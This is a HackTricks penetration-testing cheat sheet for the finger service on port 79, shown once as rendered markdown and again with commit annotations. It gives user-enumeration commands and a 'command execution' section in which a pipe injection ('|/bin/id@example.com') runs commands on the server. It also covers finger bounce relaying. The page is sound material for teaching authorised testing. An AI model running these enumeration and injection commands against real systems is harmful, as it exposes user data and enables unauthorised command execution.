hacktricks/network-services-pentesting/pentesting-finger.md

# 79 - Pentesting Finger

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

## **Basic Info**

**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.

**Default port:** 79

```
PORT   STATE SERVICE
79/tcp open  finger
```

## **Enumeration**

### **Banner Grabbing/Basic connection**

```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```

### **User enumeration**

```bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user
```

Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples:

```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```

#### **Nmap execute a script for doing using default scripts**

### Metasploit uses more tricks than Nmap

```
use auxiliary/scanner/finger/finger_users
```

### Shodan

* `port:79 USER`

## Command execution

```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```

## Finger Bounce

[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)

```
finger user@host@victim
finger @internal@external
```

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`# 79 - Pentesting Finger`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## Basic Info`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Default port: 79`

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`PORT STATE SERVICE`
			`79/tcp open finger`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## Enumeration`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`### Banner Grabbing/Basic connection`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`nc -vn <IP> 79`
			`echo "root" \| nc -vn <IP> 79`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`### User enumeration`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`finger @<Victim> #List users`
			`finger admin@<Victim> #Get info of user`
			`finger user@<Victim> #Get info of user`
			```

Adding the Finger Username Enumeration Tool. 2020-11-17 13:01:39 +00:00			`Alternatively you can use finger-user-enum from [pentestmonkey](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples:`

			```bash
			`finger-user-enum.pl -U users.txt -t 10.0.0.1`
			`finger-user-enum.pl -u root -t 10.0.0.1`
			`finger-user-enum.pl -U users.txt -T ips.txt`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`#### Nmap execute a script for doing using default scripts`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`### Metasploit uses more tricks than Nmap`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`use auxiliary/scanner/finger/finger_users`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`### Shodan`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			* `port:79 USER`

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## Command execution`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`finger "\|/bin/id@example.com"`
			`finger "\|/bin/ls -a /@example.com"`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## Finger Bounce`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)`

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`finger user@host@victim`
			`finger @internal@external`
			```

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`